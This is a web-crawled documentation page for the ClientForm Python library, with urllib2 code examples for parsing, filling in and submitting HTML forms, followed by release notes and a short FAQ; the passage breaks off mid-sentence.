https://www.safaribooksonline.com/library/view/programming-collective-intelligence/9780596529321/ch09s02.html
CC-MAIN-2017-13
refinedweb
251
65.62
span8 span4 span8 span4 This article is part 3 of a 5 part series to help you get started with basic Python and FME. This article is about using the scripted parameter functionality within Workbench and includes a walkthrough of two example applications of a scripted parameter. Scripted parameters are extremely useful when we want to set a parameter in FME based on something we derived or calculated from another parameter or parameters. For example, you may want users to select themes or groups of layers and have your script set the individual feature types to read within these groups. For Python scripts, a number of FME variables are available within the fme module, one of which returns a dictionary of FME parameters and their values. For more information, please review the Python and FME Basics introduction article. Please note scripted parameters are executed before both Python startup scripts and the translation. Attached workspace: ScriptedParameter1.fmwt ScriptedParameter1.fmwt is a good example of scripting the feature types to read parameter based on a group selected by the user. The workspace template, ScriptedParameter1.fmwt, is included within the ScriptedParameter_Workspaces.zip file (see Downloads section above). This workspace will selectively read feature types with a scripted parameter. Use the Run > Run with Prompt to see the published parameters. A Translation Parameters window will appear. Click on the ellipsis in the window to bring up the Select ‘Layers’ Items window. Notice that the layers you can choose from are groups: Feature types to read are selected by the user through a published user parameter. Choose Walking and Biking and run the workspace. Notice the workspace read both the Bikeways and the PublicStreets feature types. The Bikeways and PublicStreets feature types are read after selecting 'Walking and Biking' as the parameter. Let’s look at the scripted parameter used to tell FME that choosing Walking and Biking AUTOCAD reader to determine which feature type to read. The Feature Types to Read parameter is linked to the private scripted parameter, 'feature_types_to_read'. Go back to the scripted parameter, double click on it, and click the ellipsis to open the editor. Here is the script used inside: import fme featureTypes = '' if fme.macroValues['layers'].find('Walking and Biking') != -1: featureTypes += 'PublicStreets Bikeways ' if fme.macroValues['layers'].find('Rapid Transit') != -1: featureTypes += 'RapidTransitLine RapidTransitStations ' if fme.macroValues['layers'].find('All Methods') != -1: featureTypes += 'PublicStreets Bikeways RapidTransitLine RapidTransitStations ' #Debug #print(featureTypes) return featureTypes You can see that we have a series of if statements which finds out which layer the user chose using the fme.macroValues[ ] dictionary and then sets the value of featureTypes which will be returned. The last line is the most important as this is where we "return" the actual value of the scripted parameter with the statement: return featureTypes This return statement must always exist in a Python scripted parameter because it is here that the parameter value is given to FME. Also, notice the commented out print function. You can use print functions to help you debug your scripts by returning variable values to the Translation Log pane. For more on logging with Python see this article: Logging with Python Scripts Attached workspace: ScriptedParameter2.fmwt When writing files, you may want to ensure that your output is uniquely named. One way of doing so is to use a scripted parameter to append the date and time to the output dataset name. The attached workspace ScriptedParameter2.fmwt accepts a published parameter for the output dataset name and a private scripted parameter appends a unique value (date and time) to the published parameter value. The workspace itself find points (drinking fountains) that fall within park polygons and outputs a CSV file. This workspace will create uniquely named output datasets by appending the date and time of translation of the file name. Open the workspace and ensure that Run with Prompt (found under the Run menu) is enabled. Run the workspace and the Translation Parameters window will appear. Click OK to accept the default output dataset name. You could modify the translation parameters if you wish, then the output would be slightly different than described below. Take a look at the Translation Log pane once the workspace has finished running. Under the Features Written Summary at the end of the log, you will see the name of the output csv file written. It will be in the following format: <fileName>_<YYYYMMDD>_<HHMMSS>, where <fileName> is the value of the published parameter (test in the sample workspace), <YYYYMMDD> is the current date, and <HHMMSS> is the start time of the translation. Create unique output dataset names by using a scripted parameter to append the date and time. Go to the Navigator > User Parameters > Private Parameters > nameWithTime and double-click to open the script editor. Here is the script used inside: # Import fme module and datetime.datetime class import fme from datetime import datetime # Get the value of the published parameter OutFileName = fme.macroValues['OutFileName'] # Use the now() method to get the current date and time # Format date as YYYYMMDD_HHMMSS with strftime method curTime = datetime.now().strftime("%Y%m%d_%H%M%S") # Concatenate the published parameter, an underscore, date time OutFileName = OutFileName + '_' + curTime # Return unique file name which becomes the value of the scripted parameter # This scripted parameter is linked to the destination dataset name return OutFileName The script gets the value of the published parameter using the fme.macroValues[] dictionary and the current date and time by calling datetime.now() method. It concatenates both values and returns the unique value (fileName_YYYYMMDD_HHMMSS) to the writer with the return statement. Remember, the return statement must always exist in a scripted parameter. Go to the Navigator > Output [CSV2] > Feature Types > $(nameWithTime) >Parameters > General > CSV File Name. Notice the CSV File Name is linked to the private user parameter nameWithTime. The CSV File Name parameter is linked to the private scripted parameter nameWithTime', which creates a unique file name with Python. Note: Adding the date and time to an output file name is also possible without using scripted Python parameters (eg. by using the DateTimeNow() function that is available in the text editor). For more information on the Date/Time functions in Workbench, please see the help documentation: For using FME Objects in. Part 1: Python and FME Basics Previous: Startup Python Scripts in FME Current: Python Scripted Parameters Next: PythonCaller Transformer Part 5: Shutdown Python Scripts in FME Shutdown Python Scripts in FME Tutorial: Python and FME Basics Startup Python Scripts in FME Pyfme cannot be called from the command line with Data Interoperability Will formats I develop with the FME Plug-in SDK be compatible with FME Server? Some Python modules generate Runtime Error in FME Logging with Python scripts Choosing a different Python Interpreter (installation) How can I call an FME transformation from my own application?
https://knowledge.safe.com/articles/60080/python-scripted-parameters.html
CC-MAIN-2020-16
refinedweb
1,141
53.71
Closed Bug 1072323 Opened 8 years ago Closed 8 years ago Implement the Video/Audio Call buttons for contacts, to open up a conversation window Categories (Hello (Loop) :: Client, defect) Tracking (firefox34 verified, firefox35 verified) mozilla35 Iteration: 35.3 People (Reporter: standard8, Assigned: standard8) References Details (Whiteboard: [loop-uplift]) Attachments (1 file, 2 obsolete files) For the direct calling from desktop to other clients, we need to be able to initiate a call to a contact. We need: - Audio/Video call buttons on the sub-menu for the contact - The buttons should make a call via the mozLoop api to the MozLoopService - The service should then open the conversation window and pass to it a call id - The conversation window should then use the call id to obtain the conversation details. This is an existing mechanism that's used for incoming calls (see _processCall) I think the conversation details should contain something like: { type: "outgoing", calleeId: <email>, calleeName: <contact name> } - We might need to do some handling for the "busy" status, or we could push that out to a different bug. Points: --- → 5 Flags: firefox-backlog+ Flags: qe-verify? Whiteboard: [loop-uplift] Flags: qe-verify? → qe-verify+ Mike, I've kinda throw this together, and it depends on other patches. What I'm looking for feedback on is the general idea, and if I'm doing things in the right places or not. I suspect I possibly should be getting the display name at the contacts.jsx end of the flow, and maybe extracting the email addresses there as well - what do you think, do we have existing functions? Attachment #8499167 - Flags: feedback?(mdeboer) Comment on attachment 8499167 [details] [diff] [review] Experimental patch for hooking up contacts to outgoing calls Review of attachment 8499167 [details] [diff] [review]: ----------------------------------------------------------------- ::: browser/components/loop/MozLoopAPI.jsm @@ +572,5 @@ > + * @param {String} callType The type of call, e.g. "audio-video" or "audio-only" > + * @return true if the call is opened, false if it is not opened (i.e. busy) > + */ > + startDirectCall: { > + enumerate: true, You might want to rename this to 'enumerable' @@ +575,5 @@ > + startDirectCall: { > + enumerate: true, > + writable: true, > + value: function(contactNames, contactAddresses, callType) { > + MozLoopService.startDirectCall(contactNames, contactAddresses, callType); From an API perspective, this doesn't really make sense - two separate arrays. I'd expect a simple object like `{'name1': 'address1', 'name2': 'address2', ...}` ::: browser/components/loop/content/js/contacts.jsx @@ +63,5 @@ > return ( > <ul className={cx({ "dropdown-menu": true, > "dropdown-menu-up": this.state.openDirUp })}> > <li className={cx({ "dropdown-menu-item": true, > + "disabled": false })} You can simply remove the prop... it's not configurable with a prop (yet). @@ +304,5 @@ > this.props.startForm("contacts_add"); > }, > > + callContact: function(contact, callType) { > + navigator.mozLoop.startDirectCall(contact.name, contact.email, callType); Alright, I see why you pass this data separately. So let's re-iterate... why not send and array of contacts if there is an option for multiple contacts? If there's only one contact to ever start a direct call with, why not send the contact object as the first argument? The data structure is defined and won't change, so I think it's safe to pass around. @@ +323,5 @@ > } > }); > break; > + case "video-call": > + this.callContact(contact, CALL_TYPES.AUDIO_VIDEO); ... and in that case you can simply do `navigator.mozLoop.startDirectCall(contact, CALL_TYPES.AUDIO_VIDEO);` ::: browser/components/loop/content/js/conversationViews.jsx @@ +23,5 @@ > */ > var ConversationDetailView = React.createClass({ > propTypes: { > + contactNames: React.PropTypes.array, > + contactAddresses: React.PropTypes.array, An array of contact objects would make this so much nicer AND future-proof Attachment #8499167 - Flags: feedback?(mdeboer) → feedback+ Assignee: nobody → standard8 Iteration: --- → 35.3 Target Milestone: --- → mozilla35 This updates the patch according to the comments. Passing the contact around is definitely much nicer, and more logical. Note there's also a couple of tweaks to the mute/enabled values - as I've now got easy access to try out audio-only calls, I found a few issues with them and hence the tweaks fix the logic. Attachment #8499167 - Attachment is obsolete: true Attachment #8500431 - Flags: review?(mdeboer) Comment on attachment 8500431 [details] [diff] [review] Hook up the contact menus to be able to start outgoing calls. Review of attachment 8500431 [details] [diff] [review]: ----------------------------------------------------------------- Just some stuff I found during a dry review pass: ::: browser/components/loop/content/js/conversationViews.jsx @@ +65,5 @@ > var PendingConversationView = React.createClass({ > propTypes: { > dispatcher: React.PropTypes.instanceOf(loop.Dispatcher).isRequired, > callState: React.PropTypes.string, > + contact: React.PropTypes.array, Isn't this an object? ::: browser/components/loop/test/desktop-local/conversationViews_test.js @@ +61,5 @@ > + view = mountTestComponent({contact: contact}); > + > + expect(TestUtils.findRenderedDOMComponentWithTag( > + view, "h2").props.children).eql("fakeEmail"); > + }); nit: this indentation made count all the braces... perhaps it's good to put the closing bracket on a newline? ::: browser/components/loop/test/xpcshell/test_loopservice_directcall.js @@ +49,5 @@ > + MozLoopService.releaseCallData(callId); > +}); > + > +function run_test() > +{ nit: one-true-brace style is not something we'd like to move towards ;) ::: browser/components/loop/test/xpcshell/xpcshell.ini @@ +17,5 @@ > [test_loopservice_token_invalid.js] > [test_loopservice_token_save.js] > [test_loopservice_token_send.js] > [test_loopservice_token_validation.js] > +[test_loopservice_busy.js] why does splinter think this is a change? Comment on attachment 8500431 [details] [diff] [review] Hook up the contact menus to be able to start outgoing calls. Review of attachment 8500431 [details] [diff] [review]: ----------------------------------------------------------------- This is so awesome... I just called myself!. Attachment #8500431 - Flags: review?(mdeboer) → review+ I the patch with comments addressed to try: Fixed review comments, carrying over r=mikedeboer. Attachment #8500431 - Attachment is obsolete: true Attachment #8501165 - Flags: review+ Attachment #8501165 - Attachment description: Ptch v2: Hook up the contact menus to be able to start outgoing calls. → Patch v2: Hook up the contact menus to be able to start outgoing calls. Status: NEW → ASSIGNED Status: ASSIGNED → RESOLVED Closed: 8 years ago Resolution: --- → FIXED (In reply to Mike de Boer [:mikedeboer] from comment #5) >. That should just be a first-time issue. "ot.guid" is something we save on behalf of the sdk. Paul: This lets you test the outgoing conversation window from the contacts list. It should be in today's nightly when it is generated. Flags: needinfo?(paul.silaghi) I think one problem would be if I'm signed-in with the same account on multiple profiles (devices) and get called - the incoming call windows shows up on everyone of them. Canceling the call on one device closes the main call on the caller's side. Flags: needinfo?(paul.silaghi) Other issues: 1. I'm allowed to call a person who doesn't have me in its contacts list 2. I'm allowed to call a person who have have me in its contacts list as 'blocked' 3. while the outgoing call window is open in the 'retry/cancel/ state, edit the email of the person you've just called and click 'retry' -> the call is successfully made and it shouldn't Flags: needinfo?(standard8) This broke the ui-showcase, I pushed a fix with rs=Niko over irc to fix it (npotb): (In reply to Paul Silaghi, QA [:pauly] from comment #13) > Other issues: > 1. I'm allowed to call a person who doesn't have me in its contacts list Yes, that's intentional. See bug 1000142 for a future privacy limitation. > 2. I'm allowed to call a person who have have me in its contacts list as > 'blocked' This seems not to be implemented yet (looks like we haven't hooked up everything), so please file it. > 3. while the outgoing call window is open in the 'retry/cancel/ state, edit > the email of the person you've just called and click 'retry' -> the call is > successfully made and it shouldn't That's an edge case I think, I'm not sure what we should do, so please file a bug for now. Flags: needinfo?(standard8) 2 - bug 1079941 3 - bug 1079964 Mark, when you can, please also take a look at comment 12. Flags: needinfo?(standard8) (In reply to Paul Silaghi, QA [:pauly] from comment #12) > I think one problem would be if I'm signed-in with the same account on > multiple profiles (devices) and get called - the incoming call windows shows > up on everyone of them. Canceling the call on one device closes the main > call on the caller's side. Ah, missed this. I'm sure there's a bug on a related topic already, but I can't see it at a glance. I'm pretty sure that bug doesn't cover this case, so lets file it as well. Flags: needinfo?(standard8) Calling this verified fixed based on follow-up comments to Paul's testing. Status: RESOLVED → VERIFIED status-firefox35: --- → verified QA Contact: anthony.s.hughes → paul.silaghi Comment on attachment 8501165 [details] [diff] [review] Patch v2: Hook up the contact menus to be able to start outgoing calls. Approval Request Comment Part of the staged Loop aurora second uplift set Attachment #8501165 - Flags: approval-mozilla-aurora? status-firefox34: --- → fixed Flags: needinfo?(paul.silaghi) Verified fixed FF 34b1 Win 7 Flags: needinfo?(paul.silaghi) Comment on attachment 8501165 [details] [diff] [review] Patch v2: Hook up the contact menus to be able to start outgoing calls. Already landed in aurora, approving for posterity Attachment #8501165 - Flags: approval-mozilla-aurora? → approval-mozilla-aurora+
https://bugzilla.mozilla.org/show_bug.cgi?id=1072323
CC-MAIN-2022-40
refinedweb
1,522
56.45
I am having a huge problem with writing this program. Every time I ask the teacher for help she is too busy helping someone else. so she just tell me one thing and runs off to the next person without checking if it worked and what other help I might need. It has become very frustrating. I have been able to ask for a classmates help, but that is only when we have free time during class, if he's not too busy writing his own code. I am turning to you for help. I have written and adjusted this program so many times that I am so confused. Please take a look at my code and steer me in the right direction. I greatly appreciate it. Thank you. I also hope that I use these code tags the right way. Sorry if it doesn't work. Oh, and P.S. the teacher said we had to call a function and pass something by reference(what, I'm not sure, but I specifically remember her pointing it out) I'm thinking it's to do the calculations. I've tried to design this program using only function, but I'm not that great with those, so it's been difficult. //chapter 7 lab p475 ex8 gradebook //Intructions: //A teacher has five students who have taken four tests. //The teacher uses the following grading scale to assign a letter //grade to a student, based on the average of his or her test scores. //___________________________________ // Test Score Letter Grade //----------------------------------- // 90-100 A // 80-89 B // 70-79 C // 60-69 D // 0-59 F //___________________________________ //Write a program that uses a two-dimensional array of charachters //that hold the five student names, a single-dimensional array of //five characters to hold the five students' letter grades, and five //single-dimensional arrays of four doubles to hold each student's //set of test scores. //The program should allow the user to enter each student's name and //his or her scores. It should then calculate and display each //student's average test score and a letter grade based on that average. //Imput Validation: Do not accept test scores less than zero or greater //than 100. #include <iostream> using namespace std; //function prototype void calcdata(double []); void display data(); //start of main int main() { const int NUM_NAMES = 5; //how many occurances const int NAMESIZE = 11; //how long names can be, 10 letters const int NUM_TESTS = 4; //how many tests char name[NUM_NAMES][NAMESIZE]; //two-dimensional name array char grade[NUM_NAMES]; //grade for each student array double average[NUM_NAMES]; //average for each student array double student1[NUM_TESTS] //student1 array double student2[NUM_TESTS] //student2 array double student3[NUM_TESTS] //student3 array double student4[NUM_TESTS] //student4 array double student5[NUM_TESTS] //student5 array cout << “Enter the student’s name for (int count = 0; count < NUM_NAMES; count++) { // beginning of nested for loop cout << "Student" << (count +1) <<": "; cin >> name[count]; for (i = 0; i < NUM_NAMES; i++) cout >> name [i]; //stub statement } //end of for loop //Beginning of validation sequence taken from chapter 6 lab assignment //********Need to change to fit with this lab assignment******** cout << "Please enter test 1, with scores between 0 and 100.\n"; cin >> val1; while (val1 < 0 || val1 > 100) { cout << "You have not entered a number between 0 and 100. Please re-enter test 1.\n"; cin >> val1; }//end of while loop cout << "Please enter test 2, with scores between 0 and 100.\n"; cin >> val1; while (val2 < 0 || val2 > 100) { cout << "You have not entered a number between 0 and 100. Please re-enter test 2.\n"; cin >> val2; }//end of while loop cout << "Please enter test 3, with scores between 0 and 100.\n"; cin >> val1; while (val3 < 0 || val3 > 100) { cout << "You have not entered a number between 0 and 100. Please re-enter test 3.\n"; cin >> val3; }//end of while loop cout << "Please enter test 4, with scores between 0 and 100.\n"; cin >> val4; while (val4 < 0 || val4> 100) { cout << "You have not entered a number between 0 and 100. Please re-enter test 4.\n"; cin >> val4; }//end of while loop cout << "Please enter test 5, with scores between 0 and 100.\n"; cin >> val5; while (val5 < 0 || val5 > 100) { cout << "You have not entered a number between 0 and 100. Please re-enter test 5.\n"; cin >> val5; }//end of while loop //display output for validation cout << "Test 1 is: " << val1 << endl; cout << "Test 2 is: " << val2 << endl; cout << "Test 3 is: " << val3 << endl; cout << "Test 4 is: " << val4 << endl; cout << "Test 5 is: " << val5 << endl; //call to function calcdata calcdata(); return 0; } //end of main //************************************************ //function definition of calcdata // this function is going to get the test scores // array and calculate the averages // and calculate grade //i need to pass the student names to correspond // with the test scores, avgs, and grade //************************************************ void calcdata() const int NUM_STUDENTS = 5; const int NUM_SCORES = 4; double total, average; double scores[NUM_STUDENTS][NUM_SCORES]; //get each students average score for (int row = 0; row < NUM_STUDENTS; row++) { //set the accumulator. total = 0; //sum a row for (int col = 0; col < NUM_SCORES; col++ total += scores[row][column]; //get the average average = total / NUM_SCORES; // //************************************************** // loop used to determine grade for each students average //for (int index = 0; index < NUM_NAMES; index++) //nested loop //for (int count =0; index < NUM_NAMES; count++) if (average[0] < 60) grade[0] = ‘F’ else if (average [0] < 70) grade[0] = ‘D’ else if (average [0] < 80) grade[0] = ‘C’ else if (average [0] < 90) grade[0] = ‘B’ else (average [0] <= 100) grade[0] = ‘A’ if (average[1] < 60) grade[1] = ‘F’ else if (average [1] < 70) grade[1] = ‘D’ else if (average [1] < 80) grade[1] = ‘C’ else if (average [1] < 90) grade[1] = ‘B’ else (average [1] <= 100) grade[1] = ‘A’ if (average[2] < 60) grade[2] = ‘F’ else if (average [2] < 70) grade[2] = ‘D’ else if (average [2] < 80) grade[2] = ‘C’ else if (average [2] < 90) grade[2] = ‘B’ else (average [2] <= 100) grade[2] = ‘A’ if (average[0] < 60) grade[3] = ‘F’ else if (average [3] < 70) grade[3] = ‘D’ else if (average [3] < 80) grade[3] = ‘C’ else if (average [3] < 90) grade[3] = ‘B’ else (average [3] <= 100) grade[3] = ‘A’ if (average[0] < 60) grade[4] = ‘F’ else if (average [4] < 70) grade[4] = ‘D’ else if (average [4] < 80) grade[4] = ‘C’ else if (average [4] < 90) grade[4] = ‘B’ else (average [4] <= 100) grade[4] = ‘A’ //call to function displaydata displaydata(); return 0; }//end of function calc data //*************************************************** //definition of function displaydata //this function is designed to display the student's // average and letter grade //*************************************************** void displaydata() for (int i = 0; i < NUM_SIZE; i++) cout << "Student: " <<name [i] <<"average: " << average [i] <<"grade: " << grade [i] << endl; return 0; } // end of main
https://www.daniweb.com/programming/software-development/threads/42528/arrays-and-functions
CC-MAIN-2017-26
refinedweb
1,137
59.47
iPcTest Struct Reference This is a test property class. More... #include <propclass/test.h> Inheritance diagram for iPcTest: Detailed Description This is a test property class. This property class can send out the following messages: - 'cel.misc.test.print' (old 'pcmisc.test_print'): a message has been printed (message) This property class supports the following actions (add prefix 'cel.test.action.' if you want to access this action through a message): - Print: parameters 'message' (string). This property class supports the following properties: - counter (long, read/write): how many times something has been printed. - max (long, read/write): maximum length of what was printed. Definition at line 40 of file test.h. Member Function Documentation Print a message. The documentation for this struct was generated from the following file: Generated for CEL: Crystal Entity Layer 2.0 by doxygen 1.6.1
http://crystalspace3d.org/cel/docs/online/api-2.0/structiPcTest.html
CC-MAIN-2015-06
refinedweb
140
52.36
Type class based serialization is now standard in Scala JSON libaries such as Play JSON. All our web applications these days are designed as JSON APIs, with the UI being just an API client. We usually find we want a few different serialization formats. Here are two examples that came up recently: logged-in users can see more information than anonymous users; and, as we’re using Mongo, we want a serialization format for the database that includes more information than other clients can see. Thus we need to control which type class is used for serialization at each point. Manually importing the correct type class into scope is one approach to controlling type class visibility. This is a fantastic way to introduce bugs, as nothing in the type system will fail if we import the wrong type class. As better approach, and the one we’ve been using, is to tag the data and the type classes. I think some code helps at this point. Let’s say we have a basic User class case class User(name: String, email: String) In Play we can construct a serializer like so: import play.api.libs.json._ implicit val userWrite: Writes[User] = Json.writes[User] A Writes[User] is a type class that can write a User as JSON. If we want to write a User we can call Json.toJson(user) and the usual implicit resolution rules will look for a Writes in scope. Now suppose we don’t want to display email addresses to anonymous users. We can define a new Writes easily enough. implicit val anonymousUserWrites = new Writes[User] { def writes(in: User): JsValue = Json.obj("name" -> in.name) } The question is: how do we make sure this implicit is used at the correct points, in a way that the compiler will complain to us if we get it wrong? We’ve followed Scalaz’s lead, using unboxed tagged types. They are fairly simple beasts. The constructor Tag[A, T](a: A) applies the tag T to a value A. Tags are just empty traits and a tagged type, written A @@ T, is a subtype of A. Here’s the code: trait Anonymous def anonymous[A](in: A): A @@ Anonymous = Tag[A, Anonymous](in) Now we just need to tag anonymousUserWrites, so it only applies to Users tagged Anonymous, and we’re in business. implicit val anonymousUserWrites = new Writes[User @@ Anonymous] { def writes(in: User @@ Anonymous): JsValue = Json.obj("name" -> in.name) } Or so I thought. I’ve used tagged types before to control implicit selection, but I recently did my first implementation mixing them with Play JSON. After creating the tags and tagging the values, but not implementing any tagged type classes, I decided to check that this approach would work. It should fail to compile, because no tagged implicits are available. Imagine my surprise when everything did in fact compile! What! The whole point of tagging is to stop things compiling if a tagged implicit is not also available! I spend a few hours looking into this issue without success, and I began freaking out a bit. What dark corner of Scala’s type system had I run into? Was the savoir faire of Play’s design beyond my dour comprehension? Would I have to hand in my type-astronaut wings if I couldn’t fix this problem? Would Miles ever speak to me again if he found out? Luckily, at this point my wife phoned. The car’s battery was flat. She was stuck at work, and I needed to hop on my bike and collect the kids pronto. Inspiration came while pedalling home with 40kg of boys in the trailer behind: contravariance! Remember that tagged types are subtypes of the original type. The original, untagged, implicit instance was being picked up when we had a tagged value. This could only happen if the untagged instance was considered a subtype of a tagged instance, and that would only happen if Writes was contravariant. When I got home I checked the docs and found I was correct. I then ripped out all the tagged types and used a different method, but that’s another story and will be told another time. Lessons Learned Getting stuck in your head with a problem is often not a good idea, but I find it hard to remember to change context when I get stuck. I enjoy problem solving so when I run into a problem I want to stay at the keyboard and fix it! Rubber ducking is the same idea that doesn’t require ready access to a bike and kids. My wife is fond of saying “when you hear hoofbeats, think of horses not zebras”, which means look for the straightforward answer first. When I ran into this problem I started looking for corner cases in the type system, compiler bugs, and other esoterica. The problem involved concepts I already knew, contravariance and implicit resolution, but combined in a way I hadn’t seen before. If I had ruled out the basics first I would solved this problem quite quickly. Finally, subtyping is evil. Or at least probably doesn’t carry its weight when one gets into a highly “typeful” programming style. Scala is an interesting place with regards to subtyping. The ease of interoperation and the gentle slope from Java make Scala attractive to many, and here subtyping seems essential and type classes like wild and dangerous constructs. However, as you continue down the Scala road the language you end up using is not the language you started with. What once seemed essential can become an impediment. There is no doubt that Haskell has a cleaner take on typeful programming than Scala, but compatibility with the JVM and Java, both good and bad, is the trade-off that Scala makes.
https://underscore.io/blog/posts/2014/01/29/unboxed-tagged-angst.html
CC-MAIN-2021-49
refinedweb
975
72.16
Write a Java program to print all files and folders in a directory in sorted order : In this tutorial, we will print out all files and folders of a directory in sorted order using Java. To run this program, you will have to change the directory name defined inside ‘main’ method. Steps : - Create a new ‘File’ object by passing the scanning directory name to its constructor - Get list of all files and folders using ‘listFiles()’ method - Sort the list using ‘Arrays.sort()’ method - Now , using a ‘for-loop’, iterate through this list and get the name of each file or folder using ‘getName()’ - If it is a file, we are printing ‘File ’ before the file name and if it is a folder we are printing ‘Directory :‘. - To check if a file, use ‘isFile()’ . To check if a directory, use ‘isDirectory()‘. Example.File; import java.util.Arrays; /** * Example class */ public class ExampleClass { //utility method to print a string static void print(String value) { System.out.println(value); } /** * Method to sort all files and folders in a directory * * @param dirName : directory name * @return : No return value. Sort and print out the result */ private static void sortAll(String dirName) { File directory = new File(dirName); File[] filesArray = directory.listFiles(); //sort all files Arrays.sort(filesArray); //print the sorted values for (File file : filesArray) { if (file.isFile()) { print("File : " + file.getName()); } else if (file.isDirectory()) { print("Directory : " + file.getName()); } else { print("Unknown : " + file.getName()); } } } public static void main(String[] args) { sortAll("C://Programs/"); } } Similar tutorials : - How to override toString method to print contents of a object in Java - Java program to print a Rhombus pattern - Java Program to Delete a file using ?File? class - Java program to replace string in a file - Java program to print the boundary elements of a matrix - Java example to filter files in a directory using FilenameFilter
https://www.codevscolor.com/java-print-all-files-folders-in-directory
CC-MAIN-2020-40
refinedweb
307
55.54
A couple of days ago I decided to learn how to write a simple javascript library. I wanted to make a javascript library with a couple of function in it which could be used by anyone just like jquery. I decided to use webpack for bundling. I got webpack set up but when I embedded my bundled script in my code I could not use any of the functions that I wanted to make available in library. <script src="myLibrary.js"></script> <script type="text/javascript"> /* using any of my library functions here gave me reference error. */ </script> I knew I was trying to do what other libraries like Redux, jquery etc do. But I did not understand how they did it. So I dug deeper into webpack to understand how to do that. I have created a small project for the demonstration of how I did it. The github repo can be found at vyasriday / webpack-js-library webpack setup for writing a javascript library and making it availabe as scirt or npm package Webpack Set Up For Writing Your Own JavaScript Library How to Make the Project Work 1. Clone the repository 2. npm install 3. npm run build There is a index.js generated inside dist directory. Add it as an external script to any of your projects. Any method can be accessed on $ in in your code after embedding the bundled file. For example you can use $.capitalize in your javascript to use capitalize method The babelrc is used by jest for code transpilation. I created a src directory in which all of my source code is present. index.js is the entry file for my project. - src - index.js - capitalize.js - unique.js - distinctString.js webpack.config.js const path = require('path'); module.exports = { entry: path.resolve(__dirname, 'src/index.js'), output: { path: path.resolve(__dirname, 'dist'), filename: 'index.js', library: '$', libraryTarget: 'umd', }, module: { rules: [ { test: /\.(js)$/, exclude: /node_modules/, use: ['babel-loader'], }, ], }, resolve: { extensions: ['.js'], modules: [path.resolve(__dirname, 'src')], }, mode: 'development', devtool: 'sourceMap', }; In webpack config there are two important properties in the output for bundling a javascript library. - library: '$' - libraryTarget: 'umd' The library is the name of the variable, the code can be accessed as. For example jquery is available as $, just like that. Any function can be accessed like $.name_of_method and the libraryTarget is the library will be exposed. I am using babel-loader for code transpilation with webpack. The bundled file is put into dist directory after running build script. package.json { "name": "webpack-js-library", "jest": { "roots": [ "test/" ] }, "version": "1.0.0", "main": "dist/index.js", "scripts": { "build": "webpack", "test": "jest" }, "homepage": "", "devDependencies": { "@babel/core": "^7.5.5", "@babel/preset-env": "^7.5.5", "babel-eslint": "^10.0.2", "babel-loader": "^8.0.6", "eslint": "^6.1.0", "jest": "^24.9.0", "webpack": "^4.39.2", } } In package.json there is one important property main. The main property of a package.json is a direction to the entry point to the module that the package.json is describing. Here I want to it to point to the bundled file which is the compiled code for the library. I am also using jest for a basic test setup. It is good to have tests for a library. src/index.js import capitalize from './capitalize'; import unique from './unique'; import longestDistinctSubstring from './distinctString'; export { capitalize, unique, longestDistinctSubstring }; It is important tha you must export whatever you want to expose in your library. Here I am exposing three functions in the library. While bundling, webpack knows that it is supposed to put these functions on library. Now I can easily access my library like - <script src="dist/index.js"></script> <script type="text/javascript"> console.log($.capitalize('hridayesh')) </script> That's how you can set up webpack to write a javascript library. Posted on by: Hridayesh Sharma Javascript Enginner in ♥️ with UX Discussion
https://dev.to/_hridaysharma/setting-up-webpack-for-a-javascript-library-2h8m
CC-MAIN-2020-40
refinedweb
650
70.29
Client.__doc__ if you don't have urllib2) response = urlopen(form.click("Thanks")) A more complicated example: import ClientForm import urllib2 request = urllib2.Request("") response = urllib2.urlopen(request) forms = ClientForm.ParseResponse(response) response.close() form = forms[0] print form # very useful! # Indexing allows setting and retrieval of control values original_text = form["comments"] # a string, NOT a Control instance form["comments"] = "Blah." # Controls that represent lists (checkbox, select and radio lists) are # ListControls. Their values are sequences of list item names. # They come in two flavours: single- and multiple-selection: print form.possible_items("cheeses") form["favorite_cheese"] = ["brie"] # single form["cheeses"] = ["parmesan", "leicester", "cheddar"] # multi # is the "parmesan" item of the "cheeses" control selected? print "parmesan" in form["cheeses"] # does cheeses control have a "caerphilly" item? print "caerphilly" in form.possible_items("cheeses") # Sometimes one wants to set or clear individual items in a list: # select the item named "gorgonzola" in the first control named "cheeses" form.set(True, "gorgonzola", "cheeses") # You can be more specific: supply at least one of name, type, kind, id # and nr (most other methods on HTMLForm take the same form of arguments): # deselect "edam" in third CHECKBOX control form.set(False, "edam", type="checkbox", nr=2) # You can explicitly say that you're referring to a ListControl: # set whole value (rather than just one item of) "cheeses" ListControl form.set_value(["gouda"], name="cheeses", kind="list") # last example is almost equivalent") form.set_value([""], kind="singlelist") # Often, a single checkbox (a CHECKBOX control with a single item) is # present. In that case, the name of the single item isn't of much # interest, so it's useful to be able to check and uncheck the box # without using the item name: form.set_single(True, "smelly") # check form.set_single(False, "smelly") # uncheck #") # Many methods have a by_label argument, allowing specification of list # items by label instead of by name. At the moment, only SelectControl # supports this argument (this will be fixed). Sometimes labels are # easier to maintain than names, sometimes the other way around. form.set_value(["Mozzarella", "Caerphilly"], "cheeses", by_label=True) # It's also possible to get at the individual controls inside the form. # This is useful for calling several methods in a row on a single control, # and for the less common operations. The methods are quite similar to # those on HTMLForm: control = form.find_control("cheeses", type="select") print control.value, control.name, control.type print control.possible_items() control.value = ["mascarpone", "curd"] control.set(True, "limburger") #) # ListControl items may also be disabled (setting a disabled item is not # allowed, but clearing one is allowed): print control.get_item_disabled("emmenthal") control.set_item_disabled(True, "emmenthal") # enable all items in control control.set_all_items_disabled(False) # HTMLForm.controls is a list of all controls in the form for control in form.controls: if control.value == "inquisition": sys.exit() request2 = form.click() # urllib2.Request object response2 = urllib2.urlopen(request2) print response2.geturl() print response2.info() # headers you pickle them (directly or indirectly). The simplest solution to this is to avoid pickling HTMLForm objects. You could also pickle before filling in any password, or just set the password to "" before pickling. Python 1.5.2 or above is required. To run the tests, you need the unittest module (from PyUnit). unittest is a standard library module with Python 2.1 and above. For full documentation, see the docstrings in ClientForm.py. Note: this page describes the 0.1.x interface. See here for the old 0.0.x interface. For installation instructions, see the INSTALL file included in the distribution. Stable release.. There have been many interface changes since 0.0.x, so I don't recommend upgrading old code from 0.0.x unless you want the new features. 0.1.x includes FILE control support for file upload, handling of disabled list items, and a redesigned interface. Old release. cgi, do this? No: the cgi module does the server end of the job. It doesn't know how to parse or fill in a form or how to send it back to the server. 1.5.2 or above. urllib2required? No. urllib2? Use .click_request_data() instead of .click(). urllib2do I need? You don't. It's convenient, though. If you have Python 2.0, you need to upgrade to the version from Python 2.1 (available from). Alternatively, use the 1.5.2-compatible version. If 